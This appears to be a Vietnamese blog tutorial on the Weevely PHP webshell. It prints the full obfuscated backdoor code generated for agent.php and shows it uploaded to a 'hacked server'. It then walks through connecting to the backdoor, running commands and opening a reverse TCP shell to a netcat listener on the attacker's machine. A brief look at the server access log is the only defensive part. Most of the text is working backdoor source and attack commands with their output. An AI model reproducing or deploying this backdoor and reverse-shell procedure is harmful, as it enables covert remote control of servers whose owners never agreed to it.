Ví dụ webshell Weevely: https://github.com/epinna/weevely3
root@secureserver2:~/weevely3-master# ./weevely.py generate abcd123 agent.php--> Generated backdoor with password 'abcd123' in 'agent.php' of 1332 byte size.
agent.php chứa file đã được encoded.<?php
$d='@$r["HTTP_A%CCEPT_L%ANGUAG%E"];%if%($rr&&$%ra){$%u=parse_%url($rr);p%arse_s%tr($u';
$k='$kh="79cf%";$k%f="%eb94";%%function x(%$t,$k){$c=st%rle%n($%k%);$l=strlen($t);$o';
$Y='64_de%code%(preg_replac%e(arra%y("/%_/","/-%/"),ar%ray("/%","+%"),$ss($%';
$O='$i],%$f);%%if($e){$k=$kh.$kf;%ob_%start();@%e%val(%@gzunco%mpr%ess(@x(@b%ase';
$b='%%+(?%:;q%=0.([\\d]))?,%?/",$ra,$m);if(%$q&&$m)%{@sess%ion_st%art();$%s=&$_S%ESSI%O';
$j='s[$i%],0,$e%)%)%),$k)));$o=ob_get_c%onten%t%s();ob%_end_clean()%%;$d=bas%e%6';
$f='N;$ss="%substr%"%%%;$sl="strtolower";$%i=$m[1]%[0].$m%[1]%[1];$h=$%sl%($s';
$u='s(%md5($i.$kh%),0,3));$f%=$sl($s%s(md%5($i.$k%f),0,3%));$%p="";f%or%($z=1;$z<';
$c=str_replace('vs','','cvsrevsate_vsvsfuncvsvstion');
$H='%p%=$ss($p,3);%}if(ar%ray_%k%e%y_exists($i,$%s)){$s[$i].%=%$p%;$e=st%rpos($s[';
$U='4_enco%de(x(%gzcomp%ress($o),$%k));pr%int("<$k>$%d<%/$k>");@ses%sion_%d%estroy();}}}}';
$M='=%"%";for($i%=0;$i%<$l;%){for($j%=0;($j%<$c&&$i<$%l%);$j%+%+,$i+%+){$o.=$t{$i%';
$F='co%unt($%m[1]%);$z+%+)$p.%=$q[$m%[2][$z]];%%if(strpos(%%$p,$h)==%=0){$s[$i]="";$';
$q='%%["q%uery"]%,$q);$q=array_%values%($%q);%preg_match_al%l("/(%[\\w%])[\\w-]';
$X='}^$k{$j};}}%return %$o;%}$%r=$_SERV%ER;$r%r=@$r[%"HTTP_REFE%RER"];$ra%%=';
$S=str_replace('%','',$k.$M.$X.$d.$q.$b.$f.$u.$F.$H.$O.$Y.$j.$U);
$P=$c('',$S);$P();
?>
agent.php được đổi tên thành ma.php và sau đó được upload lên hacked server. root@secureserver2:~/weevely3-master# ./weevely.py http://192.168.5.25/ma.php abcd123--> [+] weevely 3.2.0
[+] Target: www-data@secureserver:/var/www/html[+] Session: /root/.weevely/sessions/192.168.5.25/ma_0.session[+] Shell: System shell[+] Browse the filesystem or execute commands starts the connection[+] to the target. Type :help for more information.weevely>
We now have backdoor access to the target
server and we can execute commands.
Bây giờ chúng ta đã có quyền truy cập
backdoor vào server và có thể thực thi câu lệnh
weevely> uname -a
--> Linux secureserver 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:35:06 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
www-data@secureserver:/var/www/html $
Checking the server’s access log:
192.168.5.26 - - [29/Apr/2016:12:26:25 +0100] "GET /ma.php HTTP/1.1" 200 395 "http://www.google.com.kw/url?sa=t&rct=j&q=168&source=web&cd=841&ved= 7abT6UoqC&url=168.5.25&ei=2rFeZn7kwtSbAWGxjurE6s&usg=r2jjg09LyElMcPniaayqLqluBIVqUGJvYD&sig2=lhXTdE417RZUTOBuIp6DOC" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic)Firefox/3.6.10"
Trên máy hacker,chúng ta set up Netcat listener trên port 8181:
root@secureserver2:~/# nc -l -v -p 8181--> Listening on [0.0.0.0] (family 0, port 8181)
Tạo kết nối TCP ngược về thông qua cổng 8181
www-data@secureserver:/var/www/html $ :backdoor_reversetcp 192.168.5.26 8181
Một reverse shell đã được khởi tạo (192.168.5.25 →
192.168.5.26)
Connection from [192.168.5.25] port 8181 [tcp/*] accepted (family 2, sport 55370)
$ whoami
--> www-data
Không có nhận xét nào:
Đăng nhận xét